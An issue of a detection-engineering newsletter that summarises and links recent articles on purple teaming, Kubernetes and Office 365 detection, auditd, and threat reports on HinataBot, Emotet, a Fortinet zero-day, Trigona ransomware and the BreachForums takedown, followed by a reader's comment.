Detection Engineering Weekly #16 - Breached is down, everyone get in here!
Last week's news and how-tos in the art and science of Detection Engineering
Welcome to Issue #16 of Detection Engineering Weekly!
This week’s recap:
💎 of a post by Jorge Orchilles at SANS on threat-informed detection engineering
More Youtube content, this time an interesting format on Atomics on a Friday, as well as deep diving investigations inside O365/Azure
A Naruto-themed Go botnet, Emotet uses OneNote (CALLED IT!), and Breached goes down
Explain Detection Engineering to your CEO: Feature #9 - b4stet4
Social links: Twitter
This reads like an ill omen cast upon weary travelers who dare defy detection engineering only to sow despair and obtain a false sense of security. Alright, sorry, I’m rewatching Lord of the Rings right now, so it is biasing my response. I like how b4stet4 juxtaposed new threats evolving with your business, so you need to stay current and implement the “lifecycle” of detections. Security is a field where a detection can become obsolete in a matter of hours, especially during an emerging event like Log4Shell.
💎 Detection Engineering Gem 💎
Purple Teaming and Threat-Informed Detection Engineering by Jorge Orchilles and Christopher Peacock
Orchilles and Peacock present a threat-informed approach to Detection Engineering through the Purple Team vehicle. By having an intelligence team consume cyber threat intel reports, they can suggest backlog items to the red team to test defenses in a “purple team” scenario. The “Process of Detection Engineering” flywheel looks very similar to the threat intelligence lifecycle (see page 4), but I appreciate the approach nonetheless. I’d love to hear from a company that has an organization big enough to split intel, red team, purple team, detection eng and SOC up and has a process like this implemented. I imagine most readers do this anyways, but with a lot less people.
State of the Art
Atomics on a Friday - Purple March Madness Ep 3 by Michael Haag and Paul Michaud
If you haven’t checked out Haag’s & Michaud’s “Atomics on a Friday” live stream, you definitely should! I am starting to see more video content for Detection Engineering, and Haag/Michaud do a great job of bringing on interesting guests that demonstrate concepts in Purple Teaming/Detection Engineering. It’s cool to see guests share their screens and dive deep into a topic like a brown bag lunch!
Diary of a Detection Engineer: Exposing and shutting down an inbox heist in action by Justin Schoenfeld
Great walkthrough post of a compromise starting from an alert into remediation. This post shows the “other side” of Detection Engineering, which is of course response and remediation :). Schoenfield describes their reasoning behind diving deep on this specific alert, which include heuristics around the user’s location, the IP address coming from a known VPN endpoint, and browser-based activity.
Threat Detection Bad Trips: Log Everything! by Alex Teixeira
Garbage in, garbage out. An age-old adage for computer scientists, but now applied to the SIEM use-cases of logging everything possible and “figuring it out” later. Not only does it make detections harder, but logging everything can also cost you money and tech debt in other areas of the business.
Let's talk about anonymous access to Kubernetes by Rory McCune
In this post, Rory quickly reviews a cryptojacking campaign in Kubernetes (Dero, to be specific, and is linked below in Threat Landscape) and how anonymous access in Kubernetes works. I did not know that allowing anonymous access is a common default configuration in Kubernetes environments, so make sure to review this post and audit your deployment before exposing your clusters to outside network connections (just please, not the internet!)
Detect Changes in Defender for Office 365 (MDO) Service Level Settings by Sami Lamppu
Microsoft Defender for Office 365, or MDO, has a number of attack surfaces that, if exploited, can lead to several interesting ways you can masquerade or hide inside an environment. Lamppu discusses three scenarios in detail where an attacker can influence how data is logged or manipulated in an MDO environment so specific attacks aren’t logged correctly. The blog has corresponding KQL/audit log configurations and detection opportunities.
Use Searching Engines to Hunt For Threat Actors by Russell Adler
This blog is a unique intersection of red teaming, threat intelligence, and detection engineering. I am a big fan of using detection cycles to find, fingerprint, and create detections for attacker infrastructure. There are so many open-source C2 frameworks out there it becomes relatively easy to downselect those tools with public reports against your environment and detect traffic. In this post, follow Adler as they navigate through different search engine tools to find open directories and C2 servers of real threat actors and then use those for detection opportunities.
Linux auditd for Threat Detection [Final] by IzyKnows
This is the final part of a three-part series by IzyKnows on using Linux’s auditd for threat detection. The author goes into detail in how audit collects information, what it tends to miss, and the different classes of “record types” that audit generates for certain events. The gem in this post is the corresponding Google Sheet of data sources being mapped to record types within audits.
Detection Engineering on Social Media
Threat Landscape
Uncovering HinataBot: A Deep Dive into a Go-Based Threat by Chad Seaman, Larry Cashdollar & Allen West
The Akamai team uncovered a Go-based malware that is attributed to the “HinataBot” botnet. Named after an anime character, the malware exploits some older CVEs to access routers, webservers, and poorly configured SSH servers to perform HTTP and UDP-based DDoS attacks. For the anime fans in the crowd, yeah, that Hinata :).
Feds Charge NY Man as BreachForums Boss “Pompompurin” by Brian Krebs
Pompompurin gets canned, and as of Mar 21, Breached is down
I’m sure another Raidforums/Breached will rise from the ashes, but there’s some schadenfreude on my end as we see some criminals scramble after a significant arrest like this.
CrowdStrike Discovers First-Ever Dero Cryptojacking Campaign Targeting Kubernetes by Benjamin Grap & Manoj Ahuje
If you read Rory’s piece above, read this next. Or if you read this first, go read Rory’s article next! Besides the “we were FIRST to discover this malware..” marketing-speak, this blog focuses on malware that explicitly targets Kubernetes infrastructure. It uses a DaemonSet, which then deploys pods throughout the cluster to ensure it uses all the available resources. Here is the most interesting masquerading done by the attackers from the blog:
Furthermore, attackers made no attempts to delete or disrupt cluster operation. Instead, they deployed a DaemonSet to mine Dero by masquerading the DaemonSet name to “
proxy-api
” and miner’s name to “pause
”, which are common terms in Kubernetes logs.
Emotet adopts Microsoft OneNote attachments by Malwarebytes Threat Intelligence Team
Remember how I said last week that Emotet is back, but Ivan the operator hasn’t updated the delivery payload to use OneNote attachments? Well, it only took a week, but Malwarebytes found an Emotet campaign that uses OneNote attachments as a delivery mechanism. I’m not saying the Emotet operators got this idea from me or that they are subscribers to my newsletter, but I do feel like a threat landscape Oracle connecting the dots here.
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation by Alexander Marvi, Brad Slaybaugh, Dan Ebreo, Tufail Ahmed, Muhammad Umair and Tina Johnson
Fortinet, the company that publishes dozens of vulnerabilities at a time, and many of them make CISA’s Known Exploited Vulnerabilities catalog, is used by supposed Chinese cyber-espionage actors to carry out their operations. The specific vulnerability, CVE-2022-41328, was listed in CISA’s catalog on March 14 this month! I particularly enjoyed reading Mandiant’s analysis here, and how they hammer home the importance of monitoring devices that EDRs cannot protect, such as networking devices like the ones Fortinet sells.
Bee-Ware of Trigona, An Emerging Ransomware Strain by Frank Lee and Scott Roland
Trigona is a unique ransomware variant that drops ransom notes as an HTML page with embedded javascript. In this post, Unit 42 combines intelligence gleaned from VTI as well as their own incident response practice and found some similarities between the strain and CryLock. Some victim overlap also existed for BlackCat/ALPHV. Lots of detection opportunities at the bottom of the post!
Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace by James Sadowski and Casey Charrier
Alright, besides the easter eggs of early oughts classics from Ludacris and Britney Spears, this blog post links zero days and incidents that Mandiant has observed through their own telemetry and open-source reporting. I am unsure if some of this open-source reporting is linked to CISA’s KEV, but it shows that threat actors are capitalizing on “edge infrastructure” products. This is a similar finding from another Mandiant report linked earlier with cyber-espionage actors targeting Fortinet devices.
Open Source
Red Team Toolkit by infosecn1nja
Excellent “awesome-like” list of red team tools to test your detections on.
Fluentd-MySQ by qjlawls2003
Interesting fluentd config to send syslog logs to a remote MySQL server. Definitely ripe for SQL injection, but thought it might be fun to play around with.
Awesome Kubernetes (K8s) Threat Detection Awesome by jatrost
Another “awesome” list, this time dedicated to Kubernetes threat detection. jatrost has been killing it with these lists!
Regarding the Gem - we split every team (detection engineering, hunt, Intel, red team etc). Some are even in entirely other directorates. What questions did you have? I can share some challenges we have as a detection engineering team is consuming reporting from so many sources to add to our backlog is arduous and time consuming. This takes a lot of time from detection engineering development. We’re working on developing a method to automate it but right it’s duct tape and glue. Have you seen any approaches that work well?